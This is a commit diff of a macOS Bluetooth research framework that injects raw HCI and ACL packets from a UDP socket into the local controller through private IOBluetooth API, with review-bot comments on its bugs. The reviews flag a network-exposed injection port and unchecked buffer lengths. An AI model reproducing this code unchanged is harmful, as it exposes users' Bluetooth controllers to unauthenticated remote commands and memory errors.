DYLIB_CURRENT_VERSION = 1;
DYLIB_INSTALL_NAME_BASE = "@rpath";
FRAMEWORK_VERSION = A;
GCC_NO_COMMON_BLOCKS = NO;
INFOPLIST_FILE = IOBluetoothExtended/Info.plist;
INSTALL_PATH = "$(LOCAL_LIBRARY_DIR)/Frameworks";
LD_RUNPATH_SEARCH_PATHS = (
"$(inherited)",
"@executable_path/../Frameworks",
"@loader_path/Frameworks",
);
PRODUCT_BUNDLE_IDENTIFIER = "de.tu-darmstadt.seemoo.IOBluetoothExtended";
PRODUCT_NAME = "$(TARGET_NAME:c99extidentifier)";
SKIP_INSTALL = YES;
SWIFT_OBJC_BRIDGING_HEADER = "";
SWIFT_OBJC_INTERFACE_HEADER_NAME = "IOBluetoothExtended-Swift.h";
SWIFT_OPTIMIZATION_LEVEL = "-Onone";
SWIFT_VERSION = 5.0;
};
name = Debug;
};
8C31743622D1049E004B9604 /* Release */ = {
isa = XCBuildConfiguration;
buildSettings = {
CLANG_ALLOW_NON_MODULAR_INCLUDES_IN_FRAMEWORK_MODULES = YES;
CLANG_ENABLE_MODULES = YES;
CODE_SIGN_IDENTITY = "";
CODE_SIGN_STYLE = Automatic;
COMBINE_HIDPI_IMAGES = YES;
DEFINES_MODULE = YES;
DEVELOPMENT_TEAM = 27U966V459;
DYLIB_COMPATIBILITY_VERSION = 1;
DYLIB_CURRENT_VERSION = 1;
DYLIB_INSTALL_NAME_BASE = "@rpath";
FRAMEWORK_VERSION = A;
GCC_NO_COMMON_BLOCKS = NO;
INFOPLIST_FILE = IOBluetoothExtended/Info.plist;
INSTALL_PATH = "$(LOCAL_LIBRARY_DIR)/Frameworks";
LD_RUNPATH_SEARCH_PATHS = (
"$(inherited)",
"@executable_path/../Frameworks",
"@loader_path/Frameworks",
);
PRODUCT_BUNDLE_IDENTIFIER = "de.tu-darmstadt.seemoo.IOBluetoothExtended";
PRODUCT_NAME = "$(TARGET_NAME:c99extidentifier)";
SKIP_INSTALL = YES;
SWIFT_OBJC_BRIDGING_HEADER = "";
SWIFT_OBJC_INTERFACE_HEADER_NAME = "IOBluetoothExtended-Swift.h";
SWIFT_VERSION = 5.0;
};
name = Release;
};
8C31743822D1049E004B9604 /* Debug */ = {
isa = XCBuildConfiguration;
buildSettings = {
ALWAYS_EMBED_SWIFT_STANDARD_LIBRARIES = YES;
CODE_SIGN_STYLE = Automatic;
COMBINE_HIDPI_IMAGES = YES;
DEVELOPMENT_TEAM = M66VH9B6C7;
INFOPLIST_FILE = IOBluetoothExtendedTests/Info.plist;
LD_RUNPATH_SEARCH_PATHS = (
"$(inherited)",
"@executable_path/../Frameworks",
"@loader_path/../Frameworks",
);
PRODUCT_BUNDLE_IDENTIFIER = com.davidetoldo.IOBluetoothExtendedTests;
PRODUCT_NAME = "$(TARGET_NAME)";
};
name = Debug;
};
8C31743922D1049E004B9604 /* Release */ = {
isa = XCBuildConfiguration;
buildSettings = {
ALWAYS_EMBED_SWIFT_STANDARD_LIBRARIES = YES;
CODE_SIGN_STYLE = Automatic;
COMBINE_HIDPI_IMAGES = YES;
DEVELOPMENT_TEAM = M66VH9B6C7;
INFOPLIST_FILE = IOBluetoothExtendedTests/Info.plist;
LD_RUNPATH_SEARCH_PATHS = (
"$(inherited)",
"@executable_path/../Frameworks",
"@loader_path/../Frameworks",
);
PRODUCT_BUNDLE_IDENTIFIER = com.davidetoldo.IOBluetoothExtendedTests;
PRODUCT_NAME = "$(TARGET_NAME)";
};
name = Release;
};
/* End XCBuildConfiguration section */
/* Begin XCConfigurationList section */
8C31741A22D1049D004B9604 /* Build configuration list for PBXProject "IOBluetoothExtended" */ = {
isa = XCConfigurationList;
buildConfigurations = (
8C31743222D1049E004B9604 /* Debug */,
8C31743322D1049E004B9604 /* Release */,
);
defaultConfigurationIsVisible = 0;
defaultConfigurationName = Release;
};
8C31743422D1049E004B9604 /* Build configuration list for PBXNativeTarget "IOBluetoothExtended" */ = {
isa = XCConfigurationList;
buildConfigurations = (
8C31743522D1049E004B9604 /* Debug */,
8C31743622D1049E004B9604 /* Release */,
);
defaultConfigurationIsVisible = 0;
defaultConfigurationName = Release;
};
8C31743722D1049E004B9604 /* Build configuration list for PBXNativeTarget "IOBluetoothExtendedTests" */ = {
isa = XCConfigurationList;
buildConfigurations = (
8C31743822D1049E004B9604 /* Debug */,
8C31743922D1049E004B9604 /* Release */,
);
defaultConfigurationIsVisible = 0;
defaultConfigurationName = Release;
};
/* End XCConfigurationList section */
};
rootObject = 8C31741722D1049D004B9604 /* Project object */;
}
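Review bot: the `ShellScript` build phase copies the built framework with `cp -r ${BUILT_PRODUCTS_DIR}/${EXECUTABLE_NAME}.framework ../${EXECUTABLE_NAME}.framework` and declares no `outputPaths`, so Xcode cannot track the copy for incremental builds, and the destination is a path relative to the project directory, i.e. a compiled binary dropped next to the sources (consistent with the `Binary file not shown.` entry in this commit). Prefer writing into a build output location and keeping compiled frameworks out of the repository, or at least declare the output path. Two settings will also bite anyone else cloning the project: `DEVELOPMENT_TEAM` is hard-coded to two different teams (`27U966V459` for the framework, `M66VH9B6C7` for the test bundle) together with `CODE_SIGN_STYLE = Automatic`, so the targets cannot be signed outside those accounts; and the target-level `GCC_NO_COMMON_BLOCKS = NO` silently overrides the project-level `YES`.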
@@ -0,0 +1,77 @@
<?xml version="1.0" encoding="UTF-8"?>
<Scheme
LastUpgradeVersion = "1110"
version = "1.3">
<BuildAction
parallelizeBuildables = "YES"
buildImplicitDependencies = "YES">
<BuildActionEntries>
<BuildActionEntry
buildForTesting = "YES"
buildForRunning = "YES"
buildForProfiling = "YES"
buildForArchiving = "YES"
buildForAnalyzing = "YES">
<BuildableReference
BuildableIdentifier = "primary"
BlueprintIdentifier = "8C31741F22D1049D004B9604"
BuildableName = "IOBluetoothExtended.framework"
BlueprintName = "IOBluetoothExtended"
ReferencedContainer = "container:IOBluetoothExtended.xcodeproj">
</BuildableReference>
</BuildActionEntry>
</BuildActionEntries>
</BuildAction>
<TestAction
buildConfiguration = "Debug"
selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
shouldUseLaunchSchemeArgsEnv = "YES">
<Testables>
<TestableReference
skipped = "NO">
<BuildableReference
BuildableIdentifier = "primary"
BlueprintIdentifier = "8C31742822D1049E004B9604"
BuildableName = "IOBluetoothExtendedTests.xctest"
BlueprintName = "IOBluetoothExtendedTests"
ReferencedContainer = "container:IOBluetoothExtended.xcodeproj">
</BuildableReference>
</TestableReference>
</Testables>
</TestAction>
<LaunchAction
buildConfiguration = "Debug"
selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
launchStyle = "0"
useCustomWorkingDirectory = "NO"
ignoresPersistentStateOnLaunch = "NO"
debugDocumentVersioning = "YES"
debugServiceExtension = "internal"
allowLocationSimulation = "YES">
</LaunchAction>
<ProfileAction
buildConfiguration = "Release"
shouldUseLaunchSchemeArgsEnv = "YES"
savedToolIdentifier = ""
useCustomWorkingDirectory = "NO"
debugDocumentVersioning = "YES">
<MacroExpansion>
<BuildableReference
BuildableIdentifier = "primary"
BlueprintIdentifier = "8C31741F22D1049D004B9604"
BuildableName = "IOBluetoothExtended.framework"
BlueprintName = "IOBluetoothExtended"
ReferencedContainer = "container:IOBluetoothExtended.xcodeproj">
</BuildableReference>
</MacroExpansion>
</ProfileAction>
<AnalyzeAction
buildConfiguration = "Debug">
</AnalyzeAction>
<ArchiveAction
buildConfiguration = "Release"
revealArchiveInOrganizer = "YES">
</ArchiveAction>
</Scheme>
@@ -0,0 +1,90 @@
//
// Extensions.swift
// IOBluetoothExtended
//
// Created by Davide Toldo on 12.09.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
import Foundation
extension Data {
struct HexEncodingOptions: OptionSet {
let rawValue: Int
static let upperCase = HexEncodingOptions(rawValue: 1 << 0)
}
func hexEncodedString(options: HexEncodingOptions = []) -> String {
let format = options.contains(.upperCase) ? "%02hhX" : "%02hhx"
return map { String(format: format, $0) }.joined()
}
}
extension String {
init?(_ num: UInt8?) {
if let n = num { self = String(n) }
else { return nil }
}
func separate(every stride: Int = 4, with separator: Character = " ") -> String {
return String(enumerated().map { $0 > 0 && $0 % stride == 0 ? [separator, $1] : [$1]}.joined())
}
func toAscii() -> String {
let pattern = "(0x)?([0-9a-f]{2})"
let regex = try! NSRegularExpression(pattern: pattern, options: .caseInsensitive)
let nsString = self as NSString
let matches = regex.matches(in: self, options: [], range: NSMakeRange(0, nsString.length))
var characters = matches.map {
Character(UnicodeScalar(UInt32(nsString.substring(with: $0.range(at: 2)), radix: 16)!)!)
}
characters = characters.map {
if !$0.isASCII { return "." }
if $0.asciiValue! < 32 { return "." }
if $0.asciiValue! > 130 { return "." }
if $0.isNewline { return "." }
if $0 == "\0" { return "." }
return $0
}
return String(characters)
}
var hexadecimal: Data? {
var data = Data(capacity: count / 2)
let regex = try! NSRegularExpression(pattern: "[0-9a-f]{1,2}", options: .caseInsensitive)
regex.enumerateMatches(in: self, range: NSRange(startIndex..., in: self)) { match, _, _ in
let byteString = (self as NSString).substring(with: match!.range)
let num = UInt8(byteString, radix: 16)!
data.append(num)
}
guard data.count > 0 else { return nil }
return data
}
subscript (i: Int) -> String {
return self[i ..< i + 1]
}
func substring(fromIndex: Int) -> String {
return self[min(fromIndex, count) ..< count]
}
func substring(toIndex: Int) -> String {
return self[0 ..< max(0, toIndex)]
}
subscript (r: Range<Int>) -> String {
let range = Range(uncheckedBounds: (lower: max(0, min(count, r.lowerBound)), upper: min(count, max(0, r.upperBound))))
let start = index(startIndex, offsetBy: range.lowerBound)
let end = index(start, offsetBy: range.upperBound - range.lowerBound)
return String(self[start ..< end])
}
}
extension Sequence where Element == UInt8 {
var data: Data { .init(self) }
var hexa: String { map { .init(format: "%02x", $0) }.joined() }
}
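Review bot: `hexadecimal` uses the pattern `[0-9a-f]{1,2}`, so an odd-length or malformed string is not rejected but silently re-tokenised: `"abc"` becomes `[0xab, 0x0c]` and `"12 g 34"` becomes `[0x12, 0x34]`. Since this is the parser for packets that arrive over the inject socket, require `{2}`, check that the input has even length and only hex digits, and return `nil` otherwise. In `toAscii()` the `asciiValue! > 130` test is dead (ASCII ends at 127 and `isASCII` is checked first) and the `isNewline` and `"\0"` checks are already covered by `< 32`, while 127 (DEL) still passes; a single `< 32 || == 127` test is enough. The `try!` on the two constant patterns is fine, but the force-unwraps in `UInt8(byteString, radix: 16)!` and `UInt32(..., radix: 16)!` are only safe because the regexes match hex digits exclusively, so keep the patterns and the unwraps in sync if either changes.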
@@ -0,0 +1,21 @@
//
// HCICommunicator.h
// IOBluetoothExtended
//
// Created by Davide Toldo on 19.09.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
#import <Foundation/Foundation.h>
#ifndef HCICommunicator_h
#define HCICommunicator_h
@interface HCICommunicator: NSObject
+ (void) sendHCICommand:(uint8_t [])arg1 len:(uint8_t)arg2;
+ (void) sendACLCommand:(uint8_t [])arg1 len:(uint8_t)arg2;
@end
#endif /* HCICommunicator_h */
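Review bot: `len:(uint8_t)arg2` caps both entry points at 255 bytes. An HCI command is up to 3 + 255 = 258 bytes and an ACL data packet is a 4-byte header plus a payload up to the controller's ACL MTU (typically well above 255 bytes), so longer packets are truncated at the Objective-C boundary without any error, before the implementation even reads the packet's own length byte. Use `size_t` (or at least `uint16_t`) for the length, and document that the buffer is expected without the H4 packet-type byte (opcode first, length at offset 2), since that is what the `commandSize = 3 + command[2]` logic in the implementation assumes.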
@@ -0,0 +1,70 @@
//
// HCICommunicator.m
// IOBluetoothExtended
//
// Created by Davide Toldo on 19.09.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
#import "HCICommunicator.h"
#import "IOBluetoothExtended.h"
#import <IOBluetoothHostController.h>
@implementation HCICommunicator
+ (void) sendHCICommand:(uint8_t [])arg1 len:(uint8_t)arg2 {
NSData *data = [NSData dataWithBytes:arg1 length:arg2];
uint8_t *command = calloc(arg2, sizeof(uint8_t));
memcpy(command, [data bytes], arg2);
BluetoothHCIRequestID request = 0;
int error = BluetoothHCIRequestCreate(&request, 1000, nil, 0);
if (error) {
BluetoothHCIRequestDelete(request);
printf("Couldn't create error: %08x\n", error);
}
size_t commandSize = 3;
if (arg2 > 2) {
commandSize += command[2];
}
error = BluetoothHCISendRawCommand(request, command, commandSize);
if (error) {
BluetoothHCIRequestDelete(request);
printf("Send HCI command Error: %08x\n", error);
}
sleep(0x1);
BluetoothHCIRequestDelete(request);
}
+ (void) sendACLCommand:(uint8_t [])arg1 len:(uint8_t)arg2 {
NSData *data = [NSData dataWithBytes:arg1 length:arg2];
uint8_t *commandData = calloc(arg2, sizeof(uint8_t));
memcpy(commandData, [data bytes], arg2);
BluetoothHCIRequestID request = 0;
int error = BluetoothHCIRequestCreate(&request, 1000, nil, 0);
if (error) {
BluetoothHCIRequestDelete(request);
printf("Couldn't create error: %08x\n", error);
}
// Read device handle from data
uint16_t handle = commandData[0];
error = BluetoothHCISendRawACLData(commandData, arg2, handle, request);
if (error) {
BluetoothHCIRequestDelete(request);
printf("Send HCI command Error: %08x\n", error);
}
sleep(0x1);
BluetoothHCIRequestDelete(request);
}
@end
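Review bot: `sendHCICommand` derives `commandSize = 3 + command[2]` from the packet's own length byte but never checks it against `arg2`, so a caller that passes a short buffer with a large length byte makes `BluetoothHCISendRawCommand` read up to 255 bytes past the `calloc(arg2, ...)` allocation; add `if (arg2 < 3 || 3 + command[2] > arg2) return;` before the send. In both methods the error branches after `BluetoothHCIRequestCreate` and after the send print and then fall through, so on a failed create the code still sends with a deleted request and then deletes it a second time; return after the first `BluetoothHCIRequestDelete`. The `calloc` buffers are never freed (the `NSData` round-trip is also unnecessary, `arg1` can be used directly), and `uint16_t handle = commandData[0]` takes only the low byte of the 16-bit handle/flags field, so connection handles above 0xFF go out on the wrong handle; read both bytes and mask the 12-bit handle. Finally, `sleep(0x1)` after every packet limits throughput to one packet per second; a completion callback or a much shorter wait would be better.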
@@ -0,0 +1,37 @@
//
// HCIDelegate.h
// IOBluetoothExtended
//
// Created by Davide Toldo on 06.07.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
#import <Foundation/Foundation.h>
#import <IOBluetooth/IOBluetooth.h>
#ifndef HCIDelegate_h
#define HCIDelegate_h
@interface HCIDelegate: NSObject
@property (nonatomic, assign) NSString *hostname;
@property (nonatomic, assign) NSString *inject;
@property (nonatomic, assign) NSString *snoop;
@property (nonatomic, assign) int32_t sock_fd;
@property (nonatomic, assign) int32_t client_fd;
@property (nonatomic, assign) Boolean exit_requested;
- (id) initWith:(NSString *)inject and:(NSString*)snoop;
+ (void) setHostname:(NSString *)arg1;
+ (void) setInject:(NSString *)arg1;
+ (void) setSnoop:(NSString *)arg1;
- (void) shutdown;
@end
#endif /* HCIDelegate_h */
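Review bot: the three `NSString *` properties are declared `assign`, so under ARC the delegate does not retain `hostname`, `inject` and `snoop`; once the caller's string is released they dangle, and the next `self.inject as String` on the Swift side is a use-after-free. Declare them `copy` (or `strong`). The header also declares `setHostname:`, `setInject:` and `setSnoop:` as class methods (`+`) while the values they are meant to set are instance properties; make them instance methods or drop them, since the `@property` declarations already synthesise setters. `exit_requested` is written by `shutdown` and read from the background receive loop, so it should be `atomic` (or backed by an `atomic_bool`) rather than `nonatomic`.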
@@ -0,0 +1,42 @@
//
// Commands.m
// IOBluetoothExtended
//
// Created by Davide Toldo on 06.07.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
#import "HCIDelegate.h"
#import "IOBluetoothExtended/IOBluetoothExtended-Swift.h"
@implementation HCIDelegate
Boolean exit_requested = false;
- (id) initWith:(NSString *)inject and:(NSString*)snoop {
if (self = [super init]) {
self.inject = inject;
self.snoop = snoop;
self.hostname = @"127.0.0.1";
[self initServer];
}
return self;
}
+ (void) setHostname:(NSString *)hostname {
self.hostname = hostname;
}
+ (void) setInject:(NSString *)port {
self.inject = port;
}
+ (void) setSnoop:(NSString *)port {
self.snoop = port;
}
- (void) shutdown {
exit_requested = true;
}
@end
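Review bot: `+ (void) setHostname:(NSString *)hostname { self.hostname = hostname; }` recurses until the stack overflows: inside a class method `self` is the class object, so `self.hostname = ...` compiles to `[HCIDelegate setHostname:...]`, i.e. the method calling itself; the same holds for `setInject:` and `setSnoop:`. Either remove the three methods (the properties already synthesise instance setters) or make them instance methods. Second, `shutdown` sets the file-scope global `Boolean exit_requested = false;` and not the `exit_requested` property declared in the header, while the receive loop in HCIDelegate.swift tests `self.exit_requested`, so calling `shutdown` never stops the server; delete the global and write `self.exit_requested = true;`. Minor: the file header still says `Commands.m`.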
@@ -0,0 +1,196 @@
//
// HCIDelegate.swift
// IOBluetoothExtended
//
// Created by Davide Toldo on 03.09.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
import Foundation
import Network
extension HCIDelegate: IOBluetoothHostControllerDelegate {
@objc public func initServer() {
//print("IOBE: Initializing, snoop: \(snoop ?? "-1"), inject: \(inject ?? "-1")")
self.startupServer()
}
public func sendOverUDP(data: Data, _ hostUDP: NWEndpoint.Host, _ portUDP: NWEndpoint.Port) {
var server_addr = sockaddr_in()
let server_addr_size = socklen_t(MemoryLayout.size(ofValue: server_addr))
server_addr.sin_len = UInt8(server_addr_size)
server_addr.sin_family = sa_family_t(AF_INET) // chooses IPv4
server_addr.sin_port = UInt16(portUDP.rawValue).bigEndian // chooses the port
let sock_fd = socket(AF_INET, SOCK_DGRAM, 0)
if sock_fd == -1 {
perror("Failure: creating socket")
exit(EXIT_FAILURE)
}
var bytes = [UInt8](repeating: 0, count: data.count)
(data as NSData).getBytes(&bytes, length: bytes.count)
let addr = UnsafeRawPointer(&server_addr).assumingMemoryBound(to: sockaddr.self)
sendto(sock_fd, &bytes, data.count, 0, addr, server_addr_size)
}
private func startupServer() {
let i = NWEndpoint.Port(self.inject as String)
// Create socket
let sock_fd = socket(AF_INET, SOCK_DGRAM, 0)
if sock_fd == -1 {
perror("Failure: creating socket")
exit(EXIT_FAILURE)
}
var sock_opt_on = Int32(1)
setsockopt(sock_fd, SOL_SOCKET, SO_REUSEADDR, &sock_opt_on, socklen_t(MemoryLayout.size(ofValue: sock_opt_on)))
var server_addr = sockaddr_in()
let server_addr_size = socklen_t(MemoryLayout.size(ofValue: server_addr))
server_addr.sin_len = UInt8(server_addr_size)
server_addr.sin_family = sa_family_t(AF_INET) // chooses IPv4
server_addr.sin_port = UInt16(i!.rawValue).bigEndian // chooses the port
// Bind socket
let bind_server = withUnsafePointer(to: &server_addr) {
Darwin.bind(sock_fd, UnsafeRawPointer($0).assumingMemoryBound(to: sockaddr.self), server_addr_size)
}
if bind_server == -1 {
perror("Failure: binding port")
exit(EXIT_FAILURE)
}
//print("IOBE: Listening on", server_addr.sin_port.bigEndian)
DispatchQueue.global(qos: .background).async {
while !self.exit_requested {
// Prepare for receiving data
var client_addr = sockaddr_storage()
var client_addr_len = socklen_t(MemoryLayout.size(ofValue: client_addr))
var receiveBuffer = [UInt8](repeating: 0, count: 1024)
var bytesRead = 0
// Receive data via syscall
bytesRead = withUnsafeMutablePointer(to: &client_addr) {
$0.withMemoryRebound(to: sockaddr.self, capacity: 1) {
recvfrom(sock_fd, &receiveBuffer, 1024, 0, $0, &client_addr_len)
}
}
if bytesRead == -1 {
perror("Failure: error while reading")
exit(EXIT_FAILURE)
}
// After reading the command, do all further processing on another
// Thread to be able to accept new incoming commands from the socket
DispatchQueue.global(qos: .background).async {
var command = Array([UInt8](receiveBuffer).dropFirst(2))
let length: UInt8 = receiveBuffer[1]
// Send command to Bluetooth HCI Controller
let hci_type = [UInt8](receiveBuffer)[0]
if hci_type == 0x01 {
HCICommunicator.sendHCICommand(&command, len: length)
}
else {
HCICommunicator.sendACLCommand(&command, len: length)
}
}
}
print("Exiting...")
close(self.sock_fd)
close(self.client_fd)
}
}
@objc(BluetoothHCIEventNotificationMessage:inNotificationMessage:)
public func bluetoothHCIEventNotificationMessage(_ controller: IOBluetoothHostController,
in message: UnsafeMutablePointer<IOBluetoothHCIEventNotificationMessage>) {
let opcode = message.pointee.dataInfo.opcode
let data = IOBluetoothHCIEventParameterData(message)
if opcode == 0 { return }
let dataInfo = message.pointee.dataInfo
let opcod1 = String(format:"%02X", dataInfo.opcode)
let opcod2 = Array(repeating: "0", count: 4-opcod1.count) + Array(opcod1)
if opcod2.count < 4 { return }
let opcod3 = "\(opcod2[2])\(opcod2[3])\(opcod2[0])\(opcod2[1])"
var result = "04"
result.append(String(format:"%02X", dataInfo._field7))
result.append("\(String(format:"%02X", dataInfo.parameterSize+3))")
result.append("01\(opcod3)")
result.append(data.hexEncodedString())
// printFormatted(result)
if result.count < 8 { return }
let h = NWEndpoint.Host(self.hostname as String)
let s = NWEndpoint.Port(self.snoop as String)
// Version Information
if opcode == 0x1001 {
var temp = ""
for i in [0,1,2,3,4,5,9,8,14,15,12,6,7,10,11] {
temp.append(result[i*2])
temp.append(result[i*2+1])
}
self.sendOverUDP(data: temp.hexadecimal!, h, s!)
}
// Connection Complete
else if opcode == 0x0405 || opcode == 0x0409 {
let orig = data.hexEncodedString()
var temp = "0403"
for i in [8,9,0,1,7,6,5,4,3,2] {
temp.append(orig[i*2])
temp.append(orig[i*2+1])
}
if temp.count != 24 { return }
self.sendOverUDP(data: temp.hexadecimal!, h, s!)
}
// Disconnection Complete
else if opcode == 0x0406 {
let orig = data.hexEncodedString()
if orig.count == 0 { return }
var temp = "040504"
for i in [2,1,0] {
temp.append(orig[i*2])
temp.append(orig[i*2+1])
}
self.sendOverUDP(data: temp.hexadecimal!, h, s!)
}
else {
let temp = result.hexadecimal!
if temp.count >= 8 {
self.sendOverUDP(data: temp, h, s!)
}
}
}
func printFormatted(_ result: String) {
let str = result.separate()
var formatted = ""
for (i, sub) in str.components(separatedBy: " ").enumerated() {
if i % 8 == 7 {
let rowIndex = i/8
let start = result.index(result.startIndex, offsetBy: rowIndex * 32)
let end = rowIndex * 32 + 32 < result.count ?
result.index(result.startIndex, offsetBy: rowIndex * 32 + 32) :
result.endIndex
let range = start..<end
let row = String(result[range])
formatted.append(sub + " \(row.toAscii())\n")
}
else {
formatted.append(sub + " ")
}
}
print(formatted)
}
}
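Review bot: the receive loop trusts the datagram layout without checking it against `bytesRead`: `length` is taken from `receiveBuffer[1]` and `command` is the entire 1024-byte buffer minus two bytes, so a short or malformed datagram forwards stale buffer contents, or a declared length larger than what was actually received, to `HCICommunicator.sendHCICommand` / `sendACLCommand`. Guard with `bytesRead >= 3` and `Int(length) + 2 <= bytesRead` before dispatching, and slice `command` to `length` bytes. Related: `server_addr.sin_addr` is never set in `startupServer`, so the bind is to INADDR_ANY and any host that can reach the inject port can submit HCI and ACL commands to the local controller; since `hostname` defaults to `127.0.0.1`, set `sin_addr` to the loopback address (e.g. via `inet_pton`) so the server is loopback-only. In `sendOverUDP`, `sin_addr` is likewise left zero, so the `hostUDP` argument is never used, and a fresh socket is created on every call and never closed, leaking one descriptor per forwarded event; create it once or `close(sock_fd)` after `sendto`. At the end of the loop `close(self.sock_fd)` closes the property, not the local `sock_fd` that was bound, and `exit(EXIT_FAILURE)` on a `recvfrom` error terminates the host process from inside a framework; returning from the loop after logging would be the safer behaviour.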
@@ -0,0 +1,26 @@
//
// IOBE.h
// IOBluetoothExtended
//
// Created by Davide Toldo on 19.09.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
#import <Foundation/Foundation.h>
#import <IOBluetooth/IOBluetooth.h>
#ifndef IOBE_h
#define IOBE_h
@class HCIDelegate;
@interface IOBE: NSObject {
IOBluetoothHostController *controller;
HCIDelegate *delegate;
}
- (void) shutdown;
@end
#endif /* IOBE_h */
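Review bot: the interface declares only `- (void) shutdown;`, but IOBE.m in this commit implements `- (id) initWith:(NSString *)inject and:(NSString*)snoop;`, so callers see no visible declaration for the initializer and get a "no visible @interface declares the selector" warning; add the initializer to this header. Style: HCIDelegate.h uses properties while this header declares bare ivars (`controller`, `delegate`) in the `@interface` block; picking one convention for the framework would help.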
@@ -0,0 +1,31 @@
//
// IOBE.m
// IOBluetoothExtended
//
// Created by Davide Toldo on 19.09.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
#import "IOBE.h"
#import "HCIDelegate.h"
@implementation IOBE
- (id) initWith:(NSString *)inject and:(NSString*)snoop {
if (self = [super init]) {
dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_BACKGROUND, 0), ^{
self->controller = IOBluetoothHostController.defaultController;
self->delegate = [[HCIDelegate alloc] initWith:inject and:snoop];
self->controller.delegate = self->delegate;
[[NSRunLoop currentRunLoop] run];
});
}
return self;
}
- (void) shutdown {
[self->delegate shutdown];
}
@end
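Review bot: `shutdown` only forwards to `[self->delegate shutdown]`; nothing clears `self->controller.delegate` or stops the run loop started with `[[NSRunLoop currentRunLoop] run]`, so the background block never returns and the controller keeps delivering events to a delegate that has been asked to exit. Set `self->controller.delegate = nil;` in `shutdown` and give the run loop a way to stop (for example `runUntilDate:` in a loop that checks the exit flag). Also, `delegate` is assigned asynchronously on a global queue, so a `shutdown` issued right after `initWith:and:` can run before the assignment; the message to a nil `delegate` is silently dropped and the exit request is lost.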
@@ -0,0 +1,20 @@
//
// IOBluetoothExtended.h
// IOBluetoothExtended
//
// Created by Davide Toldo on 06.07.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
#import <Cocoa/Cocoa.h>
#import <HCIDelegate.h>
#import <HCICommunicator.h>
#import <IOBluetoothHostController.h>
//! Project version number for IOBluetoothExtended.
FOUNDATION_EXPORT double IOBluetoothExtendedVersionNumber;
//! Project version string for IOBluetoothExtended.
FOUNDATION_EXPORT const unsigned char IOBluetoothExtendedVersionString[];
// In this header, you should import all the public headers of your framework using statements like #import <IOBluetoothExtended/PublicHeader.h>
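Review bot: the three framework headers are imported as `<HCIDelegate.h>`, `<HCICommunicator.h>` and `<IOBluetoothHostController.h>`, without the `IOBluetoothExtended/` prefix that the Xcode template comment on the last line prescribes for an umbrella header; use `#import <IOBluetoothExtended/HCIDelegate.h>` (and likewise for the other two) and then delete the template comment. Exposing `IOBluetoothHostController.h`, which in this commit is the class-dump header of the `IOBluetoothHostController (PrivateAPI)` category, as a public header publishes that private API surface to every client of the framework; if only the Swift extension needs it, mark it project-private instead.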
@@ -0,0 +1,349 @@
//
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
//
@import Foundation;
@import IOBluetooth;
struct IOBluetoothHCIEventNotificationMessage;
typedef struct IOBluetoothHCIEventNotificationMessage * IOBluetoothHCIEventNotificationMessageRef;
NS_ASSUME_NONNULL_BEGIN
@protocol IOBluetoothHostControllerDelegate
@optional
- (void)BluetoothHCIEventNotificationMessage:(IOBluetoothHostController*)controller
inNotificationMessage:(IOBluetoothHCIEventNotificationMessageRef)message;
@end
@interface IOBluetoothHostController (PrivateAPI)
+ (void)initialize;
+ (id)getPropertyObjectFromIOServiceNamed:(const char *)arg1 forKey:(id)arg2;
+ (id)defaultController;
+ (id)controllers;
+ (void)enableNotifications;
@property id delegate; // @synthesize delegate=_delegate;
- (void)BluetoothHostControllerSetupCompleted;
- (void)sendInquiryResultToDelegate:(struct IOBluetoothHCIEventNotificationMessage *)arg1;
- (void)processRawEventData:(const void *)arg1 dataSize:(unsigned long long)arg2;
- (void)asyncHCIEventNotificationWithRef:(struct OpaqueIOBluetoothNotificationRef *)arg1 subClass:(unsigned int)arg2 data:(const void *)arg3 dataSize:(unsigned long long)arg4;
- (void)stopHCIEventListener;
- (id)getDeviceForHCIRequestID:(unsigned int)arg1 removeIfFound:(BOOL)arg2;
- (void)addDeviceToOutstandingRequests:(id)arg1 forHCIRequestID:(unsigned int)arg2;
- (int)BluetoothHCILETrackSensor:(struct BluetoothDeviceAddress *)arg1 addressType:(unsigned char)arg2 timeoutValue:(unsigned char)arg3 outLEextOpcode:(char *)arg4;
- (int)BluetoothHCILEExtendedDuplicateFilter:(char *)arg1 outAction:(unsigned char)arg2;
- (int)BluetoothHCILEAdvPacketPacketFilterServiceUUIDClear:(struct BluetoothDeviceAddress *)arg1 addressType:(unsigned char)arg2 outLEextOpcode:(char *)arg3 outAction:(char *)arg4;
- (int)BluetoothHCILEAdvPacketPacketFilterServiceUUIDWrite:(struct BluetoothDeviceAddress *)arg1 addressType:(unsigned char)arg2 logicalType:(unsigned char)arg3 outLEextOpcode:(char *)arg4 outAction:(char *)arg5 UUID:(char *)arg6;
- (int)BluetoothHCIBroadcomTagLEA:(unsigned long long)arg1 connectionHandle:(unsigned short)arg2 input:(BOOL)arg3 channel:(BOOL)arg4;
- (int)BluetoothHCILEScanRSSIThresholdWrite:(unsigned char)arg1 rssiThresdhold:(BOOL)arg2 outAction:(char *)arg3;
- (int)BluetoothHCILEScanRSSIThresholdRead:(char *)arg1 outMode:(char *)arg2 outRSSIThreshold:(char *)arg3;
- (int)BluetoothHCILEAdvPacketContentFilterFeatureSectionClear:(struct BluetoothDeviceAddress *)arg1 addressType:(unsigned char)arg2 outLEextOpcode:(char *)arg3 outAction:(char *)arg4;
- (int)BluetoothHCILEAdvPacketContentFilterFeatureSectionRead:(struct BluetoothDeviceAddress *)arg1 addressType:(unsigned char)arg2 outLEextOpcode:(char *)arg3 outAction:(char *)arg4 outFeatureSelection:(unsigned int *)arg5 outLogicalType:(char *)arg6;
